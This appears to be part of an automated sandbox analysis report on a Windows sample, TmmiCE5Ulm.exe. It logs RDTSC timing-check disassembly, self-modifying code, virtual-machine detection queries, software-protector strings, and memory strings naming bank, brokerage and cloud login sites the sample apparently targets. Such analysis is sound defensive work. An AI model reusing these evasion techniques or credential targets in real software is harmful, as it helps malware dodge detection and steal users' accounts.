Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110369 second address: 5110380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110380 second address: 5110384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110384 second address: 511038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51104A2 second address: 511055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F05F0F49760h 0x0000000a sbb ax, 8A08h 0x0000000f jmp 00007F05F0F4975Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F05F0F49768h 0x0000001c xor ah, 00000068h 0x0000001f jmp 00007F05F0F4975Bh 0x00000024 popfd 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-2Ch] 0x00000029 jmp 00007F05F0F49766h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 mov bh, ch 0x00000032 mov edx, 496EC05Eh 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F05F0F49764h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 mov dx, ax 0x00000043 jmp 00007F05F0F4975Ah 0x00000048 popad 0x00000049 nop 0x0000004a jmp 00007F05F0F49760h 0x0000004f push eax 0x00000050 pushad 0x00000051 mov edx, 4C7A0034h 0x00000056 mov si, bx 0x00000059 popad 0x0000005a nop 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 511055D second address: 5110561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110561 second address: 5110571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110571 second address: 5110583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F5949Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110632 second address: 5110637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110637 second address: 5110654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110654 second address: 5110658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110658 second address: 5100C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F06618E748Bh 0x0000000e xor eax, eax 0x00000010 jmp 00007F05F0F32BCAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F05F0F595F3h 0x00000028 call 00007F05F593758Fh 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov si, 9253h 0x00000036 mov bx, cx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100C7F second address: 5100CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05F0F4975Eh 0x0000000f push eax 0x00000010 jmp 00007F05F0F4975Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100CBA second address: 5100CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100CBE second address: 5100CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100CD9 second address: 5100D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F05F0F5949Bh 0x0000000c jmp 00007F05F0F594A3h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007F05F0F594A4h 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D22 second address: 5100D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D26 second address: 5100D32 instructions: 0x00000000 rdtsc 0x00000002 mov si, BC35h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D32 second address: 5100D52 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05F0F49765h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D52 second address: 5100D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D58 second address: 5100D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D5C second address: 5100D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100D60 second address: 5100DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F05F0F49760h 0x00000011 pushfd 0x00000012 jmp 00007F05F0F49762h 0x00000017 jmp 00007F05F0F49765h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5100DA6 second address: 5100DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110A69 second address: 5110A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110A7E second address: 5110AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov di, ax 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 6042h 0x0000001b mov edi, 0F7C3E8Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110AAB second address: 5110AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05F0F49767h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110AE3 second address: 5110AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05F0F5949Fh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5110B3F second address: 5110B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 03BCB621h 0x0000000e jmp 00007F05F0F4975Fh 0x00000013 xor dword ptr [esp], 76122A09h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F05F0F49765h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 51209CA second address: 5120A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05F0F594A1h 0x00000009 jmp 00007F05F0F5949Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F05F0F594A8h 0x00000015 sbb cl, 00000018h 0x00000018 jmp 00007F05F0F5949Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F05F0F594A6h 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A35 second address: 5120A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A39 second address: 5120A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A3F second address: 5120A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A5E second address: 5120A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A62 second address: 5120A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120A7F second address: 5120AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F05F0F594A9h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120AB2 second address: 5120B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 5Ah 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov dh, cl 0x0000000e pushfd 0x0000000f jmp 00007F05F0F49767h 0x00000014 or si, 8ABEh 0x00000019 jmp 00007F05F0F49769h 0x0000001e popfd 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 movsx edx, cx 0x00000027 popad 0x00000028 test esi, esi 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d mov cl, 65h 0x0000002f popad 0x00000030 je 00007F06618B7005h 0x00000036 jmp 00007F05F0F4975Fh 0x0000003b cmp dword ptr [75AF459Ch], 05h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov si, dx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120B2D second address: 5120B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F06618DEDF5h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05F0F5949Ch 0x00000018 jmp 00007F05F0F594A5h 0x0000001d popfd 0x0000001e call 00007F05F0F594A0h 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007F05F0F5949Ch 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F05F0F5949Ch 0x00000034 push eax 0x00000035 pop edi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120C2E second address: 5120C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 5120C43 second address: 5120C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 8E9B1B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 8F0AC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Special instruction interceptor: First address: 978580 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1536 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 4424 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 5404 Thread sleep time: -450000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 2104 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 3012 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe TID: 1240 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Last function: Thread delayed
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2253010841.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: TmmiCE5Ulm.exe, 00000000.00000002.2686849937.00000000008C9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181239748.0000000005B22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process information queried: ProcessInformation Jump to behavior

